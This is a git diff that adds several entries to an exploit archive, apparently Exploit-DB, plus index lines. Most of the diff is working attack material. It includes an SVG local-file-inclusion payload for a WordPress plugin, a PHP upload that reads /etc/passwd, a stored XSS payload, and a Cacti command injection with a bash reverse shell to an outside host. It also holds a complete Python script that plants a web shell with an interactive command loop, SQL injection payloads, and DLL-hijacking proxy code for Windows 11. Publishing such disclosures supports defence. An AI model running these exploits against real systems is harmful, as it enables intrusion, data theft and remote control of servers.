# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php
#LFI
Steps to trigger conversion of a remote SVG
Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)
Host 2 files :
- malicious.svg
- malicious.svg[1]
Payload:
For LFI, getting wp-config.php:
Both malicious.svg and malicious.svg[1] on the remote FTP:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.
Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/
# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).

70
exploits/php/webapps/51738.txt Normal file
View file

@ -0,0 +1,70 @@
Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25
Bugs: RCE
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date of found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps
1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.
$ cat >> test.php
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php
1. Login to account
2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
3. Upload zip file
4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php
poc request
POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip
PK
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>™b%Wz½µ}(<28><><EFBFBD>(<28><><EFBFBD><08><1C>test.phpUT <09>ñòödÓòödux <0B><04><><EFBFBD><EFBFBD><04><><EFBFBD><EFBFBD><?php echo system('cat /etc/passwd');?>
PK
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>™b%Wz½µ}(<28><><EFBFBD>(<28><><EFBFBD><08><18><><EFBFBD><EFBFBD><EFBFBD><01><><EFBFBD>¤<C2A4><C281><EFBFBD><EFBFBD>test.phpUT<05>ñòödux <0B><04><><EFBFBD><EFBFBD><04><><EFBFBD><EFBFBD>PK<06><><EFBFBD><EFBFBD><01><01>N<EFBFBD><4E><EFBFBD>j<EFBFBD><6A><EFBFBD><EFBFBD><EFBFBD>
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"
50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"
1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--

40
exploits/php/webapps/51739.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
----------------------------------------------------------------------------------------------------
1-First install sonar music plugin.
2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3-Press the Add new playlist button
4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/
6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>
Bingoo
Request:
POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486
Connection: close
comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5

65
exploits/php/webapps/51740.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
# Date: 2023-07-03
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/info/downloads
# Version: Cacti 1.2.24
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
# CVE: CVE-2023-39362
# Category: WebApps
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Vulnerability discovered and reported by: Antonio Francesco Sardella
=======================================================================================
Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)
=======================================================================================
-----------------
Executive Summary
-----------------
In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.
-------
Exploit
-------
Prerequisites:
- The attacker is authenticated.
- The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".
- A Device that supports SNMP can be used.
- Net-SNMP Graphs can be used.
- snmp module of PHP is not installed.
Example of an exploit:
- Go to "Console" > "Create" > "New Device".
- Create a Device that supports SNMP version 1 or 2.
- Ensure that the Device has Graphs with one or more templates of:
- "Net-SNMP - Combined SCSI Disk Bytes"
- "Net-SNMP - Combined SCSI Disk I/O"
- (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)
- In the "SNMP Options", for the "SNMP Community String" field, use a value like this:
public\' ; touch /tmp/m3ssap0 ; \'
- Click the "Create" button.
- Check under /tmp the presence of the created file.
To obtain a reverse shell, a payload like the following can be used.
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).
----------
Root Cause
----------
A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).
----------
References
----------
- https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
- https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html
- https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

64
exploits/php/webapps/51741.py Executable file
View file

@ -0,0 +1,64 @@
#!/usr/bin/python3
# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability
# Date: 08/21/2023
# Exploit Author: 1337kid
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://boidcms.github.io/BoidCMS.zip
# Version: <= 2.0.0
# Tested on: Ubuntu
# CVE : CVE-2023-38836
import requests
import re
import argparse
parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')
parser.add_argument("-u", "--url", help="website url")
parser.add_argument("-l", "--user", help="admin username")
parser.add_argument("-p", "--passwd", help="admin password")
args = parser.parse_args()
base_url=args.url
user=args.user
passwd=args.passwd
def showhelp():
print(parser.print_help())
exit()
if base_url == None: showhelp()
elif user == None: showhelp()
elif passwd == None: showhelp()
with requests.Session() as s:
req=s.get(f'{base_url}/admin')
token=re.findall('[a-z0-9]{64}',req.text)
form_login_data={
"username":user,
"password":passwd,
"login":"Login",
}
form_login_data['token']=token
s.post(f'{base_url}/admin',data=form_login_data)
#=========== File upload to RCE
req=s.get(f'{base_url}/admin?page=media')
token=re.findall('[a-z0-9]{64}',req.text)
form_upld_data={
"token":token,
"upload":"Upload"
}
#==== php shell
php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']
with open('shell.php','w') as f:
f.writelines(php_code)
#====
file = {'file' : open('shell.php','rb')}
s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)
req=s.get(f'{base_url}/media/shell.php')
if req.status_code == '404':
print("Upload failed")
exit()
print(f'Shell uploaded to "{base_url}/media/shell.php"')
while 1:
cmd=input("cmd >> ")
if cmd=='exit': exit()
req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})
print(req.text)

39
exploits/php/webapps/51743.txt Normal file
View file

@ -0,0 +1,39 @@
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8
Bugs: Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
write https://youserver/test.xml to we_cmd[0] parameter
poc request
POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua:
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close
we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

48
exploits/php/webapps/51744.txt Normal file
View file

@ -0,0 +1,48 @@
## Title: Limo Booking Software v1.0 - CORS
## Author: nu11secur1ty
## Date: 09/08/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo
## Reference: https://portswigger.net/web-security/cors
## Description:
The application implements an HTML5 cross-origin resource sharing
(CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin http://wioydcbiourl.com
Since the Vary: Origin header was not present in the response, reverse
proxies and intermediate servers may cache it. This may enable an
attacker to carry out cache poisoning attacks. The attacker can get
some of the software resources of the victim without the victim
knowing this.
STATUS: HIGH Vulnerability
[+]Test Payload:
```
GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://wioydcbiourl.com
Referer: http://demo.phpjabbers.com/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html)
## Time spent:
00:35:00

75
exploits/php/webapps/51745.txt Normal file
View file

@ -0,0 +1,75 @@
## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/10/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The location_id parameter appears to be vulnerable to SQL injection
attacks. A single quote was submitted in the location_id parameter,
and a database error message was returned. Two single quotes were then
submitted and the error message disappeared.
The attacker easily can steal all information from the database of
this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: location_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND 1347=1347 AND ('MVss'='MVss&traveling=from
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (GTID_SUBSET)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT
(ELT(9416=9416,1))),0x71706b7071),9416) AND
('dOqc'='dOqc&traveling=from
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''')
AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND
('EEYQ'='EEYQ&traveling=from
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html)
## Time spent:
01:47:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

230
exploits/windows/local/51733.txt Normal file
View file

@ -0,0 +1,230 @@
#---------------------------------------------------------
# Title: Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
# Date: 2023-09-01
# Author: Moein Shahabi
# Vendor: https://www.microsoft.com
# Version: Windows 11 Pro 10.0.22621
# Tested on: Windows 11_x64 [eng]
#---------------------------------------------------------
Description:
HelpPane object allows us to force Windows 11 to DLL hijacking
Instructions:
1. Compile dll
2. Copy newly compiled dll "apds.dll" in the "C:\Windows\" directory
3. Launch cmd and Execute the following command to test HelpPane object "[System.Activator]::CreateInstance([Type]::GetTypeFromCLSID('8CEC58AE-07A1-11D9-B15E-000D56BFE6EE'))"
4. Boom DLL Hijacked!
------Code_Poc-------
#pragma once
#include <Windows.h>
// Function executed when the thread starts
extern "C" __declspec(dllexport)
DWORD WINAPI MessageBoxThread(LPVOID lpParam) {
    MessageBox(NULL, L"DLL Hijacked!", L"DLL Hijacked!", NULL);
    return 0;
}
PBYTE AllocateUsableMemory(PBYTE baseAddress, DWORD size, DWORD protection = PAGE_READWRITE) {
#ifdef _WIN64
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)baseAddress;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;
    // Create some breathing room
    baseAddress = baseAddress + optionalHeader->SizeOfImage;
    for (PBYTE offset = baseAddress; offset < baseAddress + MAXDWORD; offset += 1024 * 8) {
        PBYTE usuable = (PBYTE)VirtualAlloc(
            offset,
            size,
            MEM_RESERVE | MEM_COMMIT,
            protection);
        if (usuable) {
            ZeroMemory(usuable, size); // Not sure if this is required
            return usuable;
        }
    }
#else
    // x86 doesn't matter where we allocate
    PBYTE usuable = (PBYTE)VirtualAlloc(
        NULL,
        size,
        MEM_RESERVE | MEM_COMMIT,
        protection);
    if (usuable) {
        ZeroMemory(usuable, size);
        return usuable;
    }
#endif
    return 0;
}
BOOL ProxyExports(HMODULE ourBase, HMODULE targetBase)
{
#ifdef _WIN64
    BYTE jmpPrefix[] = { 0x48, 0xb8 }; // Mov Rax <Addr>
    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Rax
#else
    BYTE jmpPrefix[] = { 0xb8 }; // Mov Eax <Addr>
    BYTE jmpSuffix[] = { 0xff, 0xe0 }; // Jmp Eax
#endif
    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetBase;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    PIMAGE_OPTIONAL_HEADER optionalHeader = &ntHeaders->OptionalHeader;
    PIMAGE_DATA_DIRECTORY exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (exportDataDirectory->Size == 0)
        return FALSE; // Nothing to forward
    PIMAGE_EXPORT_DIRECTORY targetExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress);
    if (targetExportDirectory->NumberOfFunctions != targetExportDirectory->NumberOfNames)
        return FALSE; // TODO: Add support for DLLs with mixed ordinals
    dosHeader = (PIMAGE_DOS_HEADER)ourBase;
    ntHeaders = (PIMAGE_NT_HEADERS)((PBYTE)dosHeader + dosHeader->e_lfanew);
    optionalHeader = &ntHeaders->OptionalHeader;
    exportDataDirectory = &optionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    if (exportDataDirectory->Size == 0)
        return FALSE; // Our DLL is broken
    PIMAGE_EXPORT_DIRECTORY ourExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)dosHeader + exportDataDirectory->VirtualAddress);
    // ----------------------------------
    // Make current header data RW for redirections
    DWORD oldProtect = 0;
    if (!VirtualProtect(
        ourExportDirectory,
        64, PAGE_READWRITE,
        &oldProtect)) {
        return FALSE;
    }
    DWORD totalAllocationSize = 0;
    // Add the size of jumps
    totalAllocationSize += targetExportDirectory->NumberOfFunctions * (sizeof(jmpPrefix) + sizeof(jmpSuffix) + sizeof(LPVOID));
    // Add the size of function table
    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(INT);
    // Add total size of names
    PINT targetAddressOfNames = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfNames);
    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++)
        totalAllocationSize += (DWORD)strlen(((LPCSTR)((PBYTE)targetBase + targetAddressOfNames[i]))) + 1;
    // Add size of name table
    totalAllocationSize += targetExportDirectory->NumberOfNames * sizeof(INT);
    // Add the size of ordinals:
    totalAllocationSize += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
    // Allocate usuable memory for rebuilt export data
    PBYTE exportData = AllocateUsableMemory((PBYTE)ourBase, totalAllocationSize, PAGE_READWRITE);
    if (!exportData)
        return FALSE;
    PBYTE sideAllocation = exportData; // Used for VirtualProtect later
    // Copy Function Table
    PINT newFunctionTable = (PINT)exportData;
    CopyMemory(newFunctionTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfFunctions * sizeof(INT));
    exportData += targetExportDirectory->NumberOfFunctions * sizeof(INT);
    ourExportDirectory->AddressOfFunctions = (DWORD)((PBYTE)newFunctionTable - (PBYTE)ourBase);
    // Write JMPs and update RVAs in the new function table
    PINT targetAddressOfFunctions = (PINT)((PBYTE)targetBase + targetExportDirectory->AddressOfFunctions);
    for (DWORD i = 0; i < targetExportDirectory->NumberOfFunctions; i++) {
        newFunctionTable[i] = (DWORD)(exportData - (PBYTE)ourBase);
        CopyMemory(exportData, jmpPrefix, sizeof(jmpPrefix));
        exportData += sizeof(jmpPrefix);
        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfFunctions[i]);
        CopyMemory(exportData, &realAddress, sizeof(LPVOID));
        exportData += sizeof(LPVOID);
        CopyMemory(exportData, jmpSuffix, sizeof(jmpSuffix));
        exportData += sizeof(jmpSuffix);
    }
    // Copy Name RVA Table
    PINT newNameTable = (PINT)exportData;
    CopyMemory(newNameTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNames, targetExportDirectory->NumberOfNames * sizeof(DWORD));
    exportData += targetExportDirectory->NumberOfNames * sizeof(DWORD);
    ourExportDirectory->AddressOfNames = (DWORD)((PBYTE)newNameTable - (PBYTE)ourBase);
    // Copy names and apply delta to all the RVAs in the new name table
    for (DWORD i = 0; i < targetExportDirectory->NumberOfNames; i++) {
        PBYTE realAddress = (PBYTE)((PBYTE)targetBase + targetAddressOfNames[i]);
        DWORD length = (DWORD)strlen((LPCSTR)realAddress);
        CopyMemory(exportData, realAddress, length);
        newNameTable[i] = (DWORD)((PBYTE)exportData - (PBYTE)ourBase);
        exportData += length + 1;
    }
    // Copy Ordinal Table
    PINT newOrdinalTable = (PINT)exportData;
    CopyMemory(newOrdinalTable, (PBYTE)targetBase + targetExportDirectory->AddressOfNameOrdinals, targetExportDirectory->NumberOfFunctions * sizeof(USHORT));
    exportData += targetExportDirectory->NumberOfFunctions * sizeof(USHORT);
    ourExportDirectory->AddressOfNameOrdinals = (DWORD)((PBYTE)newOrdinalTable - (PBYTE)ourBase);
    // Set our counts straight
    ourExportDirectory->NumberOfFunctions = targetExportDirectory->NumberOfFunctions;
    ourExportDirectory->NumberOfNames = targetExportDirectory->NumberOfNames;
    if (!VirtualProtect(
        ourExportDirectory,
        64, oldProtect,
        &oldProtect)) {
        return FALSE;
    }
    if (!VirtualProtect(
        sideAllocation,
        totalAllocationSize,
        PAGE_EXECUTE_READ,
        &oldProtect)) {
        return FALSE;
    }
    return TRUE;
}
// Executed when the DLL is loaded (traditionally or through reflective injection)
BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    HMODULE realDLL;
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        CreateThread(NULL, NULL, MessageBoxThread, NULL, NULL, NULL);
        realDLL = LoadLibrary(L"C:\\Windows\\System32\\apds.dll");
        if (realDLL)
            ProxyExports(hModule, realDLL);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
--------------------------

26
files_exploits.csv
View file

@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
51496,exploits/go/webapps/51496.txt,"Pydio Cells 4.1.2 - Unauthorised Role Assignments",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32749,,,,,
@ -3206,6 +3207,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4319,exploits/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,dos,hardware,,2007-08-26,2016-10-27,1,CVE-2007-4553,,,,,
30530,exploits/hardware/dos/30530.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service",2007-08-27,"Humberto J. Abdelnur",dos,hardware,,2007-08-27,2016-10-27,1,CVE-2007-4553;OSVDB-39850,,,,,https://www.securityfocus.com/bid/25446/info
25124,exploits/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - GET Denial of Service",2005-02-19,MurDoK,dos,hardware,,2005-02-19,2013-05-01,1,CVE-2003-1085;OSVDB-14022,,,,,https://www.securityfocus.com/bid/12595/info
51730,exploits/hardware/dos/51730.txt,"Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service",2023-10-09,LiquidWorm,dos,hardware,,2023-10-09,2023-10-09,0,,,,,,
11043,exploits/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,dos,hardware,,2010-01-05,,0,,,Sony_Ericsson.rar,,,
48255,exploits/hardware/dos/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,dos,hardware,,2020-03-26,2020-03-26,0,CVE-2020-9375,,,,,
40910,exploits/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",dos,hardware,,2016-12-13,2016-12-13,0,,,,,,
@ -3337,6 +3339,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
